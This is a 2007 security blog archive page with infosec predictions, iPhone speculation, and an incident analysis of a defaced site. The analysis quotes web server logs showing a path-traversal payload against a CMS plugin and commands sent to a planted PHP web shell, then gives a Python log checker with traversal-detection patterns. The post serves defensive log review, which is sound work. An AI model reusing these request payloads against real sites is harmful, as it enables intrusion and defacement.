January 2007 Archives

Anton Chuvakin

Just a reminder (or heads-up, for those who have not seen it before) - if you want to see the best security blogs in one place, just bookmark this RSS feed for a Security Bloggers Network on FeedBurner.

And, it goes without saying, that if you do blog on infosec matters, you should join!

Anton Chuvakin

Finally … the wait is over. In a few short seconds, my security predictions will be unleashed onto the world.

Unlike last year, I won’t muddy the waters with scores and ratings, but will just say it: predicting is easy if you go for the obvious trends that everybody sees (“hackers will hack, phishers will phish, spammers will spam, bot herders will bot herd, other criminals will, eh, do crimes!” and - yes! - both bad and good stuff will happen in ample quantities). Last year I erred on the side of caution and got every single prediction right. Promise I will be more aggressive - and thus more fun - this time :-)

I. Platforms: Vista will have no impact on the overall risk level of most organizations out there. Yes, some holes will certainly be plugged (and I even agree that “Vista is the most secure version ever”, just like every single one of its predecessors was - in its time), but others - possibly of types we don’t even know about - will crop up. Sorry, but secure platform =/= secure Internet (kinda like you wearing a Kevlar vest doesn’t lower crime in the neighborhood).

II. New technologies: no credible technology that can alone “solve” the problem of insider threat will emerge (many will try); the insider threat problem is just too broad, diverse and rich to be solved by a single technology or even a single vendor (corollary: if somebody is trying to sell you such a technology that claims to do exactly that on its own, then - well, you know what to do …)

III. Security market: we will see more than a few firesales and possibly total and miserable security vendor failures (wanna bet which legacy SIEM vendor will die first? :-)) There are way too many companies who sell some random and often irrelevant “protection” which sometimes doesn’t even work … at their own demo … when their CTO demos it … the third time …

IV. Risk management: a confusion about what is “risk management” will not subside this year. Business risk? Information risk? Risk as threat x vulnerability x asset? Risk as probability of loss? Arrrghh! - It goes on and on and on. No standard accepted definition of risk management in the field of infosec will emerge.

V. NAC: of course, no list of 2007 predictions is valid without mentioning knack :-) And you know what? NAC will shrink, NOT grow in importance this year! This is where the rubber meets the road and fish start to swim upstream :-) - this prediction started from me reading Richard’s piece “NAC is Fighting the Last War” which struck me like a Strength 15 Lightning Bolt. Indeed, narrowly defined NAC largely targets worm infections (and will thus lose relevance) while broadly defined NAC starts to sound like having a well-run network (which is as relevant today as it was in 1992 and probably 2012 as well). The Planet NAC is about to experience a premature eclipse :-)

VI. 0-days: 2006 was the year when this previously obscure term fell victim to malignant marketEErs. 2007 will see more of the same, no doubt. But what about the real 0-day-wielding attackers, poking jokes at the above “oh-day defenders”? Security research into new types of vulnerabilities will certainly continue and more types of previously “safe” (rather, “erroneously thought of as safe”) types of content will be used to attack applications. MPG with 0day? AVI with 0day? And, our old friends doc, xls, ppt and now PDF. On the other hand, a major 0-day worm still won’t happen.

VII. IP and ID theft, data loss: at the risk of sounding hilariously obvious, I would state that such incidents of ID theft (phishing, etc), broader intellectual property (IP) theft and loss will continue largely unabated. Will we, the security community, try to stop it? Of course, but nowhere near hard enough …

VIII. Compliance: but of course! Did you think I’d miss this bad boy? Mandatory regulatory initiatives that pack a bite or a punch, such as PCI, will continue to spread and thus grow in importance, while jokes like HIPAA will continue to languish, helping my # VII prediction come true with a bang … At the same time, I am undecided on the voluntary frameworks that you can choose to comply with (ISO17799/27001, COBIT, ITIL, etc) - will they take off like a rocketship or remain steadily interesting to some? Only time will tell.

IX. Security awareness: well, security awareness will … ah, come on, just laugh: bua-ha-ha-ha-haaa :-)

X. Finally, I would like to reiterate a few of the last year’s predictions that will still ring true this year. Client-side and application-level (especially, web application) vulnerabilities will still be outrunning the server-side and platform-level ones. Major wireless attacks and malware will still not destroy the world.

So, there you have it! Enjoy, comment, slam, compliment, etc! And remember - just as one cannot predict the threats of tomorrow today, one still won’t be able to do so in 200X. And in 20XY :-) And - but I am going out on a limb here - in 2XYZ! :-)

All predictions for 2007 that I’ve seen are tagged here.

Chris Josephes

I don’t jump on over-crowded bandwagons very often, because everyone out there has thrown out their view on what the unseen iPhone will be like. I’ll admit that there is one aspect of the iPhone that I’m curious about, but nobody seems to have commented on.

If you run OS X, you have the Address Book application, iChat, and iSync. All of these programs perform some form of contact management and centralization of information. If you run Windows, you have a few PIM applications to choose from, but there’s nothing that really stands out as the end-all, be-all contact manager.

If there really is an iPhone, I’m guessing that it will also come bundled with a really good phone management application. It will provide contact management and syncing, management of other information such as images, ring tones, application settings. It might also provide the ability to control the phone directly from the computer. Whatever this application is, it will be released for both the Macintosh and Windows environments. Very few of the current cell phones come with syncing applications, so this would set them apart from everyone else in the market.

If the phone comes with a camera, and an iPod 30 pin connector, then you open the door to having a usable web camera for video conferencing applications like iChat. That prediction might be a bit of a stretch, but I’d have a hard time imagining that nobody at Apple has ever considered the idea of soft phone applications while designing a hardware phone.

That’s all the insight I have at the moment. I guess I’ll know for sure in a few hours.

Anton Chuvakin

Here is a fun account of a [relatively] advanced attack against a high-profile site (a high-profile defacement mirror site, to be exact!)

Not surprisingly, web server logs play an important role in the investigation, in a situation which I highlighted in this tip. Specifically see these two records shown in the paper:

 - - [21/Dec/2006:23:23:15 +0200] "GET
/index2.php?act=img&img=ext_cache_94afbfb2f291e0bf253fcf222e9d238e_87b12a3d14f4b97bc1b3cb0ea59fc67a
HTTP/1.0" 404 454  "http://www.zone-h.org/index2.php?option=com_jce&no_html=1&task=plugin&plugin=..<>/<...<!--//..<////..<////..<////..<////images/stories/food/x
&file=defi1_eng.php.wmv&act=ls&d=/var/www/cache/&sort=0a"
 "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)"

as well as

 - - [21/Dec/2006:23:23:59 +0200] "GET
/index2.php?option=com_jce&no_html=1&task=plugin&plugin=..<>/<...<!--//..
   <////..<////..<////..<////images/stories/food/x&file=defi1_eng.php.wmv
&act=ls&d=/var/www/cache/cacha/&sort=0a
 HTTP/1.0" 200 3411 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)"
 212.138.64.176 - - [21/Dec/2006:23:25:03 +0200] "GET /cache/cacha/020.php
 HTTP/1.0" 200 4512 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)"

(note the web server response codes in bold)

This is another fun log line from the incident account that has some lessons-learned value as well - it has a 200 code on a script that you (the web server admin) didn’t deploy (see bold)…

 - - [22/Dec/2006:01:05:15 +0200] "POST
 /cache/cacha/020.php?act=f&f=configuration.php&ft=edit&d=%2Fvar%2Fwww%2F
HTTP/1.0" 200 4781  "http://www.zone-h.org/cache/cacha/020.php?act=f&f=configuration.php&ft=edit&d=%2Fvar%2Fwww%2F"
"Mozilla/5.0 (Windows; U; Windows NT 5.1; ar; rv:1.8.0.9) Gecko/20061206
Firefox/1.5.0.9" 

So, what do we learn from this incident log analysis:

1. Look for weird commands (those containing “.<!--//..<” certainly qualify) with 200 HTTP response codes

2. Look for executable files you didn’t put on your server with 200 response codes

3. Don’t let your defacement mirror be defaced :-)
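
The first two lessons can be turned into a log check. The following is an added example, not code from the original post or from the incident paper: the sample log lines are constructed (modelled on the records quoted above, with placeholder client addresses), and the `DEPLOYED` manifest of known scripts is an assumption.

```python
import re
from urllib.parse import unquote

# Apache combined log: host ident user [time] "METHOD url proto" status bytes ...
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3}) \S+')

# Sequences with no place in a normal request: directory traversal and
# markup fragments such as the "..<!--//..<" string seen in the records.
WEIRD_RE = re.compile(r'\.\./|\.\.\\|\.\.<|<!--|<>|/{3,}')
SCRIPT_EXT = ('.php', '.phtml', '.cgi', '.pl', '.asp', '.aspx', '.jsp')

def analyze(lines, deployed_scripts):
    """Return (line_no, rule, host, path) for suspicious requests answered 200."""
    findings = []
    for no, line in enumerate(lines, 1):
        m = LOG_RE.match(line)
        if not m or m['status'] != '200':
            continue  # a 404 is a failed probe; the 200s are the ones that worked
        url = unquote(m['url'])          # decode %2F etc. before matching
        path = url.split('?', 1)[0]
        if WEIRD_RE.search(url):         # lesson 1: weird command + 200
            findings.append((no, 'weird-request', m['host'], path))
        if path.lower().endswith(SCRIPT_EXT) and path not in deployed_scripts:
            findings.append((no, 'unknown-script', m['host'], path))  # lesson 2
    return findings

# Assumption: the set of script paths the admin actually deployed.
DEPLOYED = {'/index.php', '/index2.php'}

# Constructed sample lines; 192.0.2.x / 198.51.100.x are documentation addresses.
SAMPLE = [
    '192.0.2.10 - - [21/Dec/2006:23:23:15 +0200] "GET /index2.php?act=img'
    '&img=ext_cache_x HTTP/1.0" 404 454 "-" "Mozilla/4.0"',
    '192.0.2.10 - - [21/Dec/2006:23:23:59 +0200] "GET /index2.php?option=com_jce'
    '&task=plugin&plugin=..<>/<...<!--//..<////images/stories/food/x&act=ls'
    '&d=/var/www/cache/cacha/ HTTP/1.0" 200 3411 "-" "Mozilla/4.0"',
    '192.0.2.10 - - [21/Dec/2006:23:25:03 +0200] "GET /cache/cacha/020.php '
    'HTTP/1.0" 200 4512 "-" "Mozilla/4.0"',
    '192.0.2.10 - - [22/Dec/2006:01:05:15 +0200] "POST /cache/cacha/020.php'
    '?act=f&f=configuration.php&ft=edit&d=%2Fvar%2Fwww%2F HTTP/1.0" 200 4781 '
    '"-" "Mozilla/5.0"',
    '198.51.100.7 - - [22/Dec/2006:01:06:00 +0200] "GET /index.php HTTP/1.0" '
    '200 5120 "-" "Mozilla/5.0"',
]

if __name__ == '__main__':
    for finding in analyze(SAMPLE, DEPLOYED):
        print(finding)
```

The failed 404 probe and the ordinary `/index.php` hit are ignored; the traversal request that returned 200 and both hits on the undeployed `020.php` are reported.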